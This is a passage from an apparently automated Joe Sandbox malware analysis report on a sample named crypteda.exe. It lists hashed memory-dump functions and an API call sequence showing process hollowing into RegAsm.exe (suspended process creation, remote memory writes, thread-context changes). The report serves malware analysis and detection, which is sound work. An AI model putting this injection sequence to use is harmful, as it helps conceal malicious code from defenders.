Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5de0e60cee3e1189b6f70c1a2b9152a25b475bd5159b15adea520bd6b710f69
Instruction ID: 477148e87a67a8ab23a98e7b0b834372101501d677b981a3e21b145bffb856fd
Opcode Fuzzy Hash: f5de0e60cee3e1189b6f70c1a2b9152a25b475bd5159b15adea520bd6b710f69
Instruction Fuzzy Hash: B9D05B7531111977C6057779F4194FE779AEBC5561304412EE54AC7240CF692D0147D6

Function 06B2B7E0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7249c75195a55b5e60a974e91fd36f0d96ef8b9979260baa1a0624e6d8b0b47
Instruction ID: ff72feac91006c94160829173e8bd7028adae48104fd6ba0c03fdb76ef25dc63
Opcode Fuzzy Hash: c7249c75195a55b5e60a974e91fd36f0d96ef8b9979260baa1a0624e6d8b0b47
Instruction Fuzzy Hash: 04E07575D0020CEFCB41DFA5D5448DEFBB9EB48200F1082AAD815A3210EA305B559B80

Function 06B291DA Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdbacfc40a934ebdda82b0e41ced99d2f526b8456799278ae171fe6289215438
Instruction ID: 0e8d7e9dba34e9bc444e40a452ce4bad20180c4662bfee5ef8e3a8a4a7f90b36
Opcode Fuzzy Hash: cdbacfc40a934ebdda82b0e41ced99d2f526b8456799278ae171fe6289215438
Instruction Fuzzy Hash: 9CE0C2B56082504FD350DBA8DA606267BE19F9921431A89FFC91ECB392DA21DC12C340

Function 06DC4630 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac19a5c48b8816e3f1d5c37318116e3a1145897642d98ef210bb2576a8dfde32
Instruction ID: b8d8c775ca1a7da03a989c157ef28bf8c146f935088b6b27f42347b1049d115b
Opcode Fuzzy Hash: ac19a5c48b8816e3f1d5c37318116e3a1145897642d98ef210bb2576a8dfde32
Instruction Fuzzy Hash: F5D017327101249F87049B5EE40486ABBEEEFC966132540ABE109C7322CA61EC028790

Function 06B2E4D0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a15d3bdc5ca2834f09848a3031de9396c66fb5110229d57c04e2d0aad1165148
Instruction ID: 55ed33131c078924e19bf3d7a72caeca44f02164d15bd015b7743b1ade747eba
Opcode Fuzzy Hash: a15d3bdc5ca2834f09848a3031de9396c66fb5110229d57c04e2d0aad1165148
Instruction Fuzzy Hash: EFD01271A0130CFBCB00DFA8E90159DB7B9EB85215B1051A9D408D7301EA311E109B91

Function 06B2FBAA Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7935febcc33af818832520a8f3809f71cbbcfb49787bc8ff917404cb2aae65f0
Instruction ID: b17a3182e44dab7572d0bb6e85afdd4715867b4c8b675443e86aecd42029f5a8
Opcode Fuzzy Hash: 7935febcc33af818832520a8f3809f71cbbcfb49787bc8ff917404cb2aae65f0
Instruction Fuzzy Hash: 64C012377482204B4698A66C70101ADA6D3EBC82F339591AFE60EC33C8DD618C024B84

Function 06DC4A00 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3828abca8068fe7d466f69f685859594d3bcc3075c9d0f5cb4cdc2e70a1032c
Instruction ID: 66964b5b5a34e6afe52bb39b674fee64b92fa6cc31c8ec1f681544b990a17886
Opcode Fuzzy Hash: f3828abca8068fe7d466f69f685859594d3bcc3075c9d0f5cb4cdc2e70a1032c
Instruction Fuzzy Hash: 78C012390097859EC7561F64EC05546BFB1BF46310F12488ED0C046472CB36045CC732

Function 06DCACD0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e65252ca4c2066428927844a1c69a7fce53d5f0ed068446ff907e8be8405c16b
Instruction ID: 50c5fd274ec9604824d7dd72bb004e2abf78900cdcf9131f241697f73ad87443
Opcode Fuzzy Hash: e65252ca4c2066428927844a1c69a7fce53d5f0ed068446ff907e8be8405c16b
Instruction Fuzzy Hash: 30C08C3899010DCFC740ABA5F008C9837ECFF8433A3164194F90C8B631EB36EC008A80

Function 06DC1B99 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e607cfbf38bced7931a51ed1df3876b63ae1b32af7060808e7d23e54d4558158
Instruction ID: 7d1c6f1bc0d167ee966a37c352585f12a4746aaae78434b5aa882c1d990207f6
Opcode Fuzzy Hash: e607cfbf38bced7931a51ed1df3876b63ae1b32af7060808e7d23e54d4558158
Instruction Fuzzy Hash: E0D05B30106386CFDF12AB24F954B527F67E706304F0571D6D14046053E27C0814CB52

Function 06B23721 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1fb48272e3175a3018bb823043c345f4adef41236023786d8915ca4fe6d7242
Instruction ID: 3b0a5086596af7ac9b14f0a6f9b0fc14c20d162b6e63946197691140046e43a2
Opcode Fuzzy Hash: d1fb48272e3175a3018bb823043c345f4adef41236023786d8915ca4fe6d7242
Instruction Fuzzy Hash: 04C08C711093802FC70206505C1AD923FB02BA6B00F0360C2F6848B1D391611519EBB2

Function 06DC041E Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d25dcbb355fe15071adb87fb45083d775cb9bf4679f7e7c35b3c47c7f05b6691
Instruction ID: 29320773db64fbc0d3b0aafb3889c17412ab56702193f75a22f64bd1226b546e
Opcode Fuzzy Hash: d25dcbb355fe15071adb87fb45083d775cb9bf4679f7e7c35b3c47c7f05b6691
Instruction Fuzzy Hash: EDD06C7094920ADFE7149F50D269BAA7BB4AB18318F600418D001AA692C77A8A4ACB91

Non-executed Functions

Function 06E02E88 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122369915.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6e00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e15aa14a590b09b001aa8eccc7ae6dbc8a9312539bc1420a532db925b0948a85
Instruction ID: c0eaa39e6aa01282299a1fbfd6eb2a6e8ea7df7b225d84d63fcd5516b20e9b18
Opcode Fuzzy Hash: e15aa14a590b09b001aa8eccc7ae6dbc8a9312539bc1420a532db925b0948a85
Instruction Fuzzy Hash: 1C61BF74E012089FEB54DFA9C880ADDBBB2FF89300F649169D505BB360DB35A986CF54

Function 06E03158 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122369915.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6e00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9343b7bf9365d073d810295fc01b8e347a031d5c193dd983d4714dcb7245d0
Instruction ID: 90f57f64d1bafd8f4cfe284e73d376a634e0f8b355e97de1d614e7f9d443387d
Opcode Fuzzy Hash: ae9343b7bf9365d073d810295fc01b8e347a031d5c193dd983d4714dcb7245d0
Instruction Fuzzy Hash: 4A014834A0030C9FDB00CB94D8449ADBBB8EB4A211F116186E909AB2A1C6319D54CB91

Function 06B2E587 Relevance: 46.6, Strings: 37, Instructions: 390COMMON

Download Yara Rule

Strings

Di, xrefs: 06B2E8F0
Di, xrefs: 06B2E7DB
Di, xrefs: 06B2E73B
Di, xrefs: 06B2EAAE
Di, xrefs: 06B2E82B
Di, xrefs: 06B2E9B8
Di, xrefs: 06B2E8A3
Di, xrefs: 06B2E990
Di, xrefs: 06B2E968
Di, xrefs: 06B2EA30
Di, xrefs: 06B2E7B3
Di, xrefs: 06B2E803
Di, xrefs: 06B2E5EE
Di, xrefs: 06B2EB2F
Di, xrefs: 06B2E613
Di, xrefs: 06B2E6A7
Di, xrefs: 06B2E918
Di, xrefs: 06B2E65D
Di, xrefs: 06B2E638
Di, xrefs: 06B2E5C9
Di, xrefs: 06B2E940
Di, xrefs: 06B2E763
Di, xrefs: 06B2E9E0
Di, xrefs: 06B2E8C8
Di, xrefs: 06B2E6CC
Di, xrefs: 06B2E87B
Di, xrefs: 06B2EA58
Di, xrefs: 06B2E5A4
Di, xrefs: 06B2E853
Di, xrefs: 06B2E78B
Di, xrefs: 06B2E716
Di, xrefs: 06B2EAD9
Di, xrefs: 06B2EA83
Di, xrefs: 06B2E682
Di, xrefs: 06B2EB04
Di, xrefs: 06B2E6F1
Di, xrefs: 06B2EA08

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID: Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di
API String ID: 0-221844820
Opcode ID: 9c683d97b162e5d35474072f5c4f205b094ebc38c13a6c26cc720fe410b73cea
Instruction ID: 678122939070bb0fa003c3287ea044be674383641b45272ac941dc9485aa79eb
Opcode Fuzzy Hash: 9c683d97b162e5d35474072f5c4f205b094ebc38c13a6c26cc720fe410b73cea
Instruction Fuzzy Hash: C3D1A038320B01ABE606A7F4ED616BDA65ABBCA700FA4D92CD1094F790DF712C1587D7

Function 06B2E598 Relevance: 46.6, Strings: 37, Instructions: 383COMMON

Download Yara Rule

Strings

Di, xrefs: 06B2E8F0
Di, xrefs: 06B2E7DB
Di, xrefs: 06B2E73B
Di, xrefs: 06B2EAAE
Di, xrefs: 06B2E82B
Di, xrefs: 06B2E9B8
Di, xrefs: 06B2E8A3
Di, xrefs: 06B2E990
Di, xrefs: 06B2E968
Di, xrefs: 06B2EA30
Di, xrefs: 06B2E7B3
Di, xrefs: 06B2E803
Di, xrefs: 06B2E5EE
Di, xrefs: 06B2EB2F
Di, xrefs: 06B2E613
Di, xrefs: 06B2E6A7
Di, xrefs: 06B2E918
Di, xrefs: 06B2E65D
Di, xrefs: 06B2E638
Di, xrefs: 06B2E5C9
Di, xrefs: 06B2E940
Di, xrefs: 06B2E763
Di, xrefs: 06B2E9E0
Di, xrefs: 06B2E8C8
Di, xrefs: 06B2E6CC
Di, xrefs: 06B2E87B
Di, xrefs: 06B2EA58
Di, xrefs: 06B2E5A4
Di, xrefs: 06B2E853
Di, xrefs: 06B2E78B
Di, xrefs: 06B2E716
Di, xrefs: 06B2EAD9
Di, xrefs: 06B2EA83
Di, xrefs: 06B2E682
Di, xrefs: 06B2EB04
Di, xrefs: 06B2E6F1
Di, xrefs: 06B2EA08

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID: Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di
API String ID: 0-221844820
Opcode ID: 9775d57493484d82015c8494afbff06ad1ef7ff282c523d7fc8cd9d2bbdc0176
Instruction ID: bedc7740f87d6cd3e794e63b256260df46bed522db1f8e04644d00aacaa06a77
Opcode Fuzzy Hash: 9775d57493484d82015c8494afbff06ad1ef7ff282c523d7fc8cd9d2bbdc0176
Instruction Fuzzy Hash: 34D1A038320B01ABE606A7F4ED61ABDA55ABBC9700FA4D92CC1094F790DF712C1587D7

Function 06DC3097 Relevance: 32.8, Strings: 26, Instructions: 279COMMON

Download Yara Rule

Strings

Di, xrefs: 06DC316D
Di, xrefs: 06DC3123
Di, xrefs: 06DC3304
Di, xrefs: 06DC30B4
Di, xrefs: 06DC3329
Di, xrefs: 06DC3373
Di, xrefs: 06DC334E
Di, xrefs: 06DC3407
Di, xrefs: 06DC31B7
Di, xrefs: 06DC3451
Di, xrefs: 06DC30D9
Di, xrefs: 06DC32DF
Di, xrefs: 06DC3192
Di, xrefs: 06DC3226
Di, xrefs: 06DC3148
Di, xrefs: 06DC324B
Di, xrefs: 06DC3270
Di, xrefs: 06DC33BD
Di, xrefs: 06DC342C
Di, xrefs: 06DC31DC
Di, xrefs: 06DC3201
Di, xrefs: 06DC3398
Di, xrefs: 06DC30FE
Di, xrefs: 06DC33E2
Di, xrefs: 06DC3295
Di, xrefs: 06DC32BA

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID: Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di
API String ID: 0-1801247659
Opcode ID: c3c5a6147b0610764f18dde104e38869898f8c870ae0fa73b269b328f51867a1
Instruction ID: df05aaed4f80055be234d914da3c99566207479f67fa2b1ac4e4a2c976fb9d7d
Opcode Fuzzy Hash: c3c5a6147b0610764f18dde104e38869898f8c870ae0fa73b269b328f51867a1
Instruction Fuzzy Hash: A191C034321B01AFE606A7F4ED516BE6656FBC9700FA0992CD2094F790CF726D158B93

Function 06DC30A8 Relevance: 32.8, Strings: 26, Instructions: 273COMMON

Download Yara Rule

Strings

Di, xrefs: 06DC316D
Di, xrefs: 06DC3123
Di, xrefs: 06DC3304
Di, xrefs: 06DC30B4
Di, xrefs: 06DC3329
Di, xrefs: 06DC3373
Di, xrefs: 06DC334E
Di, xrefs: 06DC3407
Di, xrefs: 06DC31B7
Di, xrefs: 06DC3451
Di, xrefs: 06DC30D9
Di, xrefs: 06DC32DF
Di, xrefs: 06DC3192
Di, xrefs: 06DC3226
Di, xrefs: 06DC3148
Di, xrefs: 06DC324B
Di, xrefs: 06DC3270
Di, xrefs: 06DC33BD
Di, xrefs: 06DC342C
Di, xrefs: 06DC31DC
Di, xrefs: 06DC3201
Di, xrefs: 06DC3398
Di, xrefs: 06DC30FE
Di, xrefs: 06DC33E2
Di, xrefs: 06DC3295
Di, xrefs: 06DC32BA

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID: Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di
API String ID: 0-1801247659
Opcode ID: ad7a6a390bb9123ba01da0af65c9acc84e1ee759283118c30a938996ede54c7e
Instruction ID: 307dfff1c37c82c60ee21dec9a4dfe0a6cb76a82517adee17243dda3ab735027
Opcode Fuzzy Hash: ad7a6a390bb9123ba01da0af65c9acc84e1ee759283118c30a938996ede54c7e
Instruction Fuzzy Hash: 6E91A034321B01AFE606A7E4ED516BE665AFBC9700FA0992CD2090F790DF726D158BD3

Function 06B2CF57 Relevance: 16.4, Strings: 13, Instructions: 151COMMON

Download Yara Rule

Strings

Di, xrefs: 06B2D077
Di, xrefs: 06B2D10B
Di, xrefs: 06B2D130
Di, xrefs: 06B2CFBE
Di, xrefs: 06B2CF74
Di, xrefs: 06B2D008
Di, xrefs: 06B2D0C1
Di, xrefs: 06B2D0E6
Di, xrefs: 06B2CF99
Di, xrefs: 06B2D052
Di, xrefs: 06B2D02D
Di, xrefs: 06B2D09C
Di, xrefs: 06B2CFE3

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID: Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di
API String ID: 0-2743657870
Opcode ID: ad4658ae2bd3c76dbdfe97040038562d922d46fe672d5bc015401133e906d372
Instruction ID: 059f77f25910d471997c0d5e7616ba9d24e5e133403911d24803cb1695352741
Opcode Fuzzy Hash: ad4658ae2bd3c76dbdfe97040038562d922d46fe672d5bc015401133e906d372
Instruction Fuzzy Hash: 3A41D235321B01AFE602A7F4ED516BD665ABBCA600FA0DA2CD2094F780CF762D158797

Function 06B2CF68 Relevance: 16.4, Strings: 13, Instructions: 143COMMON

Download Yara Rule

Strings

Di, xrefs: 06B2D077
Di, xrefs: 06B2D10B
Di, xrefs: 06B2D130
Di, xrefs: 06B2CFBE
Di, xrefs: 06B2CF74
Di, xrefs: 06B2D008
Di, xrefs: 06B2D0C1
Di, xrefs: 06B2D0E6
Di, xrefs: 06B2CF99
Di, xrefs: 06B2D052
Di, xrefs: 06B2D02D
Di, xrefs: 06B2D09C
Di, xrefs: 06B2CFE3

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID: Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di
API String ID: 0-2743657870
Opcode ID: 521ec18da378c025fcf57adcda951a4e02f17d56e9408da9c9884a4a5ed73f05
Instruction ID: 2139117c8bf1cd000cc04b4388c84e0538ee5b03a4b6fc0121c64ff4e9c9df0a
Opcode Fuzzy Hash: 521ec18da378c025fcf57adcda951a4e02f17d56e9408da9c9884a4a5ed73f05
Instruction Fuzzy Hash: 7141B238321B01ABE606A7F4ED516BD665ABBCA600FA0DA3CD2094F780CF752D0587D7

Function 06B2D1A9 Relevance: 10.1, Strings: 8, Instructions: 105COMMON

Download Yara Rule

Strings

Di, xrefs: 06B2D1C4
Di, xrefs: 06B2D1E9
Di, xrefs: 06B2D27D
Di, xrefs: 06B2D2C7
Di, xrefs: 06B2D233
Di, xrefs: 06B2D2A2
Di, xrefs: 06B2D20E
Di, xrefs: 06B2D258

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID: Di$Di$Di$Di$Di$Di$Di$Di
API String ID: 0-427482554
Opcode ID: f9a23c54f4f2c1bbe66c7522b53fa148ebc65e4a5f064dedc77da3e71d926437
Instruction ID: 786b0ee5183bfba3a841a97f3940b72005413fbd69f75570c9a56bce3a33ca5b
Opcode Fuzzy Hash: f9a23c54f4f2c1bbe66c7522b53fa148ebc65e4a5f064dedc77da3e71d926437
Instruction Fuzzy Hash: 7131C334320B01AFE603A7E4ED516BDA65ABBC9610FA09A2CD1094F780DFB16D0587D7

Function 06B2D1B8 Relevance: 10.1, Strings: 8, Instructions: 93COMMON

Download Yara Rule

Strings

Di, xrefs: 06B2D1C4
Di, xrefs: 06B2D1E9
Di, xrefs: 06B2D27D
Di, xrefs: 06B2D2C7
Di, xrefs: 06B2D233
Di, xrefs: 06B2D2A2
Di, xrefs: 06B2D20E
Di, xrefs: 06B2D258

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID: Di$Di$Di$Di$Di$Di$Di$Di
API String ID: 0-427482554
Opcode ID: 134b99eb00e322fc69982820a6ad2c6ceb81fc20e748a23a28062fc366c77110
Instruction ID: 87e3fb82e3089e2b89bac7094288a41cd20c38dceafd34c5ba747752067ff537
Opcode Fuzzy Hash: 134b99eb00e322fc69982820a6ad2c6ceb81fc20e748a23a28062fc366c77110
Instruction Fuzzy Hash: 99219334320B11ABE606A7E4ED516BDA65ABBC9600FA0DA2CD2094F780CFB56C0587D7

Function 06B2CC40 Relevance: 8.8, Strings: 7, Instructions: 89COMMON

Download Yara Rule

Strings

Di, xrefs: 06B2CD29
Di, xrefs: 06B2CCAE
Di, xrefs: 06B2CC85
Di, xrefs: 06B2CCD7
Di, xrefs: 06B2CD00
Di, xrefs: 06B2CC5C
Di, xrefs: 06B2CD52

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID: Di$Di$Di$Di$Di$Di$Di
API String ID: 0-1084884928
Opcode ID: 61fbeae27c1c55919b64fab4cae3ec702c17d6faf81a1a8ab248a19c3771359f
Instruction ID: ce431878572c5bf5d8a19dfe92e8e43b10a6f696fa4102d2f67416593c99f6b1
Opcode Fuzzy Hash: 61fbeae27c1c55919b64fab4cae3ec702c17d6faf81a1a8ab248a19c3771359f
Instruction Fuzzy Hash: B731AF3030178A6BEB025BB4EC559BD7B66FBCA700B509228D1468F790CB706D5A8BC6

Function 06B2CC50 Relevance: 8.8, Strings: 7, Instructions: 83COMMON

Download Yara Rule

Strings

Di, xrefs: 06B2CD29
Di, xrefs: 06B2CCAE
Di, xrefs: 06B2CC85
Di, xrefs: 06B2CCD7
Di, xrefs: 06B2CD00
Di, xrefs: 06B2CC5C
Di, xrefs: 06B2CD52

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID: Di$Di$Di$Di$Di$Di$Di
API String ID: 0-1084884928
Opcode ID: 63053b4751c5ef02fb3096a9d7d056ff60e337fbfb0a695bc968425a9cfd14ce
Instruction ID: 14b90ff494af8ee961b6d823a7aad1b4a56bdd45cb30dd6ae383c82b9e80dd02
Opcode Fuzzy Hash: 63053b4751c5ef02fb3096a9d7d056ff60e337fbfb0a695bc968425a9cfd14ce
Instruction Fuzzy Hash: 0D21B13031174A6BEB026BB4EC558BD7766FBC9700B50922CE1064F790CF706D5A8BC6

Function 06B2D7F8 Relevance: 7.6, Strings: 6, Instructions: 83COMMON

Download Yara Rule

Strings

Di, xrefs: 06B2D8A8
Di, xrefs: 06B2D883
Di, xrefs: 06B2D839
Di, xrefs: 06B2D814
Di, xrefs: 06B2D8CD
Di, xrefs: 06B2D85E

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID: Di$Di$Di$Di$Di$Di
API String ID: 0-100505788
Opcode ID: 78f2cde9bb34f044a16a259db589c59e05e05eeff5dc3a9616c40e8824f3ed0e
Instruction ID: 6a196cf24796d355a72bb171fc7d3c8576afddd1d203eb4fb5b32a62035493c9
Opcode Fuzzy Hash: 78f2cde9bb34f044a16a259db589c59e05e05eeff5dc3a9616c40e8824f3ed0e
Instruction Fuzzy Hash: FD21C435320B016FE603A7E4E9516BDA65AFBC6610FA0DA2CD1094F780CF722D1587D3

Function 06B2D808 Relevance: 7.6, Strings: 6, Instructions: 73COMMON

Download Yara Rule

Strings

Di, xrefs: 06B2D8A8
Di, xrefs: 06B2D883
Di, xrefs: 06B2D839
Di, xrefs: 06B2D814
Di, xrefs: 06B2D8CD
Di, xrefs: 06B2D85E

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID: Di$Di$Di$Di$Di$Di
API String ID: 0-100505788
Opcode ID: 26ce78ba18d24cd63c46cbf4889e0159adad68b4e5500c98a0279f80d98db106
Instruction ID: 16ddded3d39130ec0c34e31911ad568d589b7519ff78299c412e9fffc4f7319e
Opcode Fuzzy Hash: 26ce78ba18d24cd63c46cbf4889e0159adad68b4e5500c98a0279f80d98db106
Instruction Fuzzy Hash: 2E11A734320B116BE602A7E5E951A7DA55AFBC9600FA0DA3CD1094F780CF722D1587D3

Analysis Process: crypteda.exePID: 3920, Parent PID: 3212COMMON

Execution Graph

Execution Coverage:	27.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	20
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02E4255D Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02E424CF,02E424BF), ref: 02E426CC
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02E426DF
Wow64GetThreadContext.KERNEL32(000002EC,00000000), ref: 02E426FD
ReadProcessMemory.KERNELBASE(000002F0,?,02E42513,00000004,00000000), ref: 02E42721
VirtualAllocEx.KERNELBASE(000002F0,?,?,00003000,00000040), ref: 02E4274C
WriteProcessMemory.KERNELBASE(000002F0,00000000,?,?,00000000,?), ref: 02E427A4
WriteProcessMemory.KERNELBASE(000002F0,00400000,?,?,00000000,?,00000028), ref: 02E427EF
WriteProcessMemory.KERNELBASE(000002F0,?,?,00000004,00000000), ref: 02E4282D
Wow64SetThreadContext.KERNEL32(000002EC,02E20000), ref: 02E42869
ResumeThread.KERNELBASE(000002EC), ref: 02E42878

Strings

ReadProcessMemory, xrefs: 02E4264A
ResumeThread, xrefs: 02E42699
TerminateProcess, xrefs: 02E4275B
aryA, xrefs: 02E425A3
Load, xrefs: 02E4259B
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 02E426CB
SetThreadContext, xrefs: 02E42683
ress, xrefs: 02E425E7
VirtualAllocEx, xrefs: 02E4265D
GetThreadContext, xrefs: 02E42637
VirtualAlloc, xrefs: 02E42624
WriteProcessMemory, xrefs: 02E42670
CreateProcessA, xrefs: 02E42611
GetP, xrefs: 02E425DF

Memory Dump Source

